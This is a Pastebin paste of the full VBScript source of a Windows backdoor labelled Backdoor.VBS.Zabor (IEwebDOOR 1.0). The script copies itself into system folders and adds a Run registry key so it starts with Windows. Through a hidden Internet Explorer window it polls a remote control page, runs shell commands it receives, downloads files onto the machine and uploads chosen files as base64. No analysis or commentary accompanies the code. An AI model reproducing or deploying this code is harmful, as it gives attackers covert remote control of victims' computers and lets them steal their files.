FlyFar

Backdoor.VBS.Zabor - Source Code

Jun 13th, 2023
154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 8.47 KB | Cybersecurity | 0 0
  1. '*******************
  2. '*  IEwebDOOR 1.0  *
  3. '*******************
  4. '*   WWW.SOOM.CZ   *
  5. '*       2006      *
  6. '*    .cCuMiNn.    *
  7. '*******************
  8.  
  9. strIdentString   = "XXXXXXXXXX"
  10. strPath          = "C:\WINDOWS\"
  11. strPathAlter     = "C:\"
  12. strName          = "sysconf32"
  13.  
  14. strKlic          = "\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & strName
  15. Set WshShell     = WScript.CreateObject ("WScript.Shell")
  16. strJmenoSoubor   = WScript.ScriptFullName
  17. strCestaSoubor   = Mid(strJmenoSoubor, 1, InStrRev(strJmenoSoubor, "\"))
  18. strLink          = "http://www.soom.cz/projects/webdoor/enter.php?client=" & strIdentString
  19. strAlphabet      = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
  20. Set objProstredi = WshShell.Environment("Process")
  21. strOSNT          = objProstredi("OS")
  22. intWaitMinut     = 10
  23.  
  24. bStartReg()
  25.  
  26. bAkce()
  27.  
  28. Function bAkce()
  29. On Error Resume Next : Err.Clear
  30.   Set objIE = WScript.CreateObject("InternetExplorer.Application")
  31.   Do While true
  32.     objIE.Navigate (strLink)
  33.     objIE.Visible = 0
  34.     If Err.Number <> 0 Then Exit Function
  35.     Do While objIE.Busy
  36.       WScript.Sleep(200)
  37.     Loop
  38.     intWaitMinut  = objIE.Document.form_backdoor.interval.value
  39.     bZobraz       = objIE.Document.form_backdoor.in_hide.checked
  40.     intCekani     = objIE.Document.form_backdoor.in_wait.checked
  41.     strPrikaz     = objIE.Document.form_backdoor.in_command.value
  42.     strDownload   = objIE.Document.form_backdoor.in_download.value
  43.     strUpload     = objIE.Document.form_backdoor.in_upload.value
  44.     If Err.Number <> 0 Then
  45.       Err.Clear
  46.       objIE.Quit
  47.       Exit Function
  48.     End If
  49.     strError = ""
  50.     If (strDownload <> "") And (strOSNT<>"") Then
  51.       strBase64 = objIE.Document.form_backdoor.base64.value
  52.       strBinary = strBase64Decode (strBase64)
  53.       If SaveFile(strCestaSoubor & strDownload, strBinary)= false Then
  54.         strError = strError & "- Sobor (" & strDownload & ") se nepoda�ilo nahr�t na ovl�dan� syst�m!" & vbCrLf
  55.       Else
  56.         strError = strError & "- Sobor (" & strDownload & ") se poda�ilo �p�n� nahr�t na ovl�dan� syst�m!" & vbCrLf
  57.       End If
  58.     End If
  59.     objIE.Document.form_backdoor.base64.value = ""
  60.     If bZobraz Then bZobraz = false
  61.     If strPrikaz = "autodestroy" Then
  62.       objIE.Document.form_backdoor.error.value = strAutodestroy()
  63.       objIE.Document.form_backdoor.submit()
  64.       Do While (objIE.Busy)
  65.         WScript.Sleep 200
  66.       Loop
  67.       objIE.Quit
  68.       WScript.Quit
  69.     End If
  70.     If (strPrikaz <> "") Then
  71.       strPrikaz = "%COMSPEC% /c " & """" & strPrikaz & """"
  72.       WshShell.Run strPrikaz, bZobraz, bCekani
  73.     End If
  74.     If (strUpload<>"") And (strOSNT<>"") Then
  75.       Set objFso = WScript.CreateObject ("Scripting.FileSystemObject")
  76.       If objFso.FileExists(strUpload) Then
  77.         strBinary = LoadFile (strUpload)
  78.         If LenB(strBinary)>0 Then
  79.           strData_base64 = strBase64Encode (strBinary)
  80.           objIE.Document.form_backdoor.base64.value = strData_base64
  81.         Else
  82.           objIE.Document.form_backdoor.in_upload.value = ""
  83.           objIE.Document.form_backdoor.base64.value = ""
  84.           strError = strError & "- Vy��dan� soubor (" & strUpload & ") se nepoda�ilo na��st!" & vbCrLf
  85.         End If
  86.       Else
  87.         objIE.Document.form_backdoor.in_upload.value = ""
  88.         objIE.Document.form_backdoor.base64.value = ""
  89.         strError = strError & "- Vy��dan� soubor (" & strUpload & ") nenalezen!" & vbCrLf
  90.       End If
  91.     End If
  92.     objIE.Document.form_backdoor.error.value = strError
  93.     objIE.Document.form_backdoor.submit()
  94.     Do While (objIE.Busy)
  95.       WScript.Sleep 200
  96.     Loop
  97.     bAkce = true
  98.     For I = 1 To intWaitMinut
  99.       WScript.Sleep(60000)
  100.     Next
  101.   Loop
  102. End Function
  103.  
  104. function strAutodestroy()
  105.   On Error Resume Next : Err.Clear
  106.   WshShell.RegDelete ("HKLM"+strKlic)
  107.   If Err.Number = 0 Then  
  108.     strError = strError & "- Klient byl �sp�n� odstran�n z registru." & vbCrLf
  109.   Else
  110.     Err.Clear
  111.     WshShell.RegDelete ("HKCU"+strKlic)
  112.     If Err.Number = 0 Then
  113.       strError = strError & "- Klient byl �sp�n� odstran�n z registru." & vbCrLf
  114.     Else
  115.       Err.Clear
  116.       strError = strError & "- Klienta se nepoda�ilo odstranit z registru." & vbCrLf
  117.     End If
  118.   End If
  119.   Set objFso = WScript.CreateObject ("Scripting.FileSystemObject")
  120.   objFso.DeleteFile strPath & strName & ".vbs", true
  121.   If Err.Number = 0 Then
  122.     strError = strError & "- Klient byl �sp�n� odstran�n z disku." & vbCrLf
  123.   Else  
  124.     Err.Clear
  125.     objFso.DeleteFile strPathAlter & strName & ".vbs", true
  126.     If Err.Number = 0 Then
  127.       strError = strError & "- Klient byl �sp�n� odstran�n z disku." & vbCrLf
  128.     Else
  129.       Err.Clear
  130.       strError = strError & "- Klienta se nepoda�ilo odstranit z disku." & vbCrLf
  131.     End If
  132.   End If
  133.   strAutodestroy = strError
  134. End Function
  135.  
  136. Function bStartReg()
  137.   On Error Resume Next : Err.Clear
  138.   if (strCestaSoubor <> strPath) And (strCestaSoubor <> strPathAlter) Then
  139.     Set objFso  = WScript.CreateObject ("Scripting.FileSystemObject")
  140.     Set objFile = objFso.GetFile (strJmenoSoubor)
  141.     strCesta    = strPath & strName & ".vbs"
  142.     objFile.Copy (strCesta)
  143.     If Err.Number <> 0 Then
  144.       Err.Clear
  145.       strCesta  = strPathAlter & strName & ".vbs"
  146.       objFile.Copy (strCesta)
  147.       If Err.Number <> 0 Then
  148.         Err.Clear
  149.         bStartReg = false
  150.         Exit Function
  151.       End If
  152.     End If
  153.     WshShell.RegWrite "HKLM" & strKlic, strCesta, "REG_SZ"
  154.     If Err.Number <> 0 Then
  155.       Err.Clear
  156.       WshShell.RegWrite "HKCU" & strKlic, strCesta, "REG_SZ"
  157.       If Err.Number <> 0 Then
  158.         Err.Clear
  159.         bStartReg = false
  160.         Exit Function
  161.       End If
  162.     End If
  163.     WshShell.Run strCesta, 0, false
  164.     If Err.Number = 0 Then WScript.Quit
  165.   End If
  166.   bStartReg = true
  167. End function
  168.  
  169. Function strBase64Encode(binString)
  170. On Error Resume Next : Err.Clear
  171.   vystup = ""
  172.   dopln  = ""
  173.   Dim b64znak(4)
  174.   binString = MidB(binString, 1, LenB(binString))
  175.   Do While (LenB(binString) Mod 3)
  176.     binString = binString & ChrB(0)
  177.     dopln = dopln & "="
  178.   Loop
  179.   For i = 1 To LenB(binString) Step 3
  180.     ascZnak1   = MidB(binString, i,   1)
  181.     ascZnak2   = MidB(binString, i+1, 1)
  182.     ascZnak3   = MidB(binString, i+2, 1)
  183.     b64znak(1) = (AscB(ascZnak1)  And 252)/4
  184.     b64znak(2) = ((AscB(ascZnak1) And 3)*16)+((AscB(ascZnak2) And 240)/16)
  185.     b64znak(3) = ((AscB(ascZnak2) And 15)*4 )+((AscB(ascZnak3) And 192)/64)
  186.     b64znak(4) = AscB(ascZnak3)   And 63
  187.     For y = 1 To 4
  188.       vystup   = vystup + Mid(strAlphabet, b64znak(y)+1, 1)
  189.     Next
  190.   Next
  191.   vystup   = Left(vystup, len(vystup)-len(dopln)) & dopln
  192.   If Err.Number = 0 Then
  193.     strBase64Encode = vystup
  194.   Else
  195.     Err.Clear
  196.     strBase64Encode = false
  197.   End If
  198. End Function
  199.  
  200. Function strBase64Decode (binString)
  201.   On Error Resume Next : Err.Clear
  202.   vystup = ""
  203.   dopln  = ""
  204.   Dim b64znak(4)
  205.   For i = 0 To Len(binString)-2 Step 4
  206.     For y = 1 To 4
  207.        b64znak(y) = InStr(strAlphabet, Mid(binString, i+y, 1))-1
  208.        If b64znak(y) < 0 Then
  209.           i = i + 1
  210.           y = y - 1
  211.        End If
  212.        If b64znak(y) = 64 Then
  213.          i = i + 1
  214.          y = y - 1
  215.          dopln = dopln & "A"
  216.        End If
  217.     Next
  218.     ascZnak1 = (b64znak(1)*4)+((b64znak(2) And 48)/16)
  219.     ascZnak2 = ((b64znak(2) And 15)*16)+((b64znak(3) And 60)/4)
  220.     ascZnak3 = ((b64znak(3) And 3)*64)+b64znak(4)
  221.     vystup   = vystup & Chr(ascZnak1) & Chr(ascZnak2) & Chr(ascZnak3)
  222.   Next
  223.   vystup = Left(vystup, Len(vystup) - Len(dopln))
  224.   If Err.Number = 0 Then
  225.     strBase64Decode = vystup
  226.   Else
  227.     Err.Clear
  228.     strBase64Decode = false
  229.   End If
  230. End Function
  231.  
  232. Function LoadFile(FileName)
  233.   On Error Resume Next : Err.Clear
  234.   Set objBinaryStream = CreateObject("ADODB.Stream")
  235.   objBinaryStream.Type = 1
  236.   objBinaryStream.Open
  237.   objBinaryStream.LoadFromFile FileName
  238.   If Err.Number = 0 Then
  239.     LoadFile = objBinaryStream.Read
  240.   Else
  241.     Err.Clear
  242.     LoadFile = false
  243.   End If
  244. End Function
  245.  
  246. Function SaveFile (FileName, text)
  247.   On Error Resume Next : Err.Clear
  248.   Set objTextStream     = WScript.CreateObject ("ADODB.Stream")
  249.   objTextStream.type    = 2
  250.   objTextStream.charset = "Windows-1250"
  251.   objTextStream.open()
  252.   objTextStream.WriteText text
  253.   objTextStream.saveToFile FileName, 2
  254.   objTextStream.Close
  255.   If Err.Number = 0 Then
  256.     SaveFile = true
  257.   Else
  258.     Err.Clear
  259.     SaveFile = false
  260.   End If
  261. End Function
Add Comment
Please, Sign In to add comment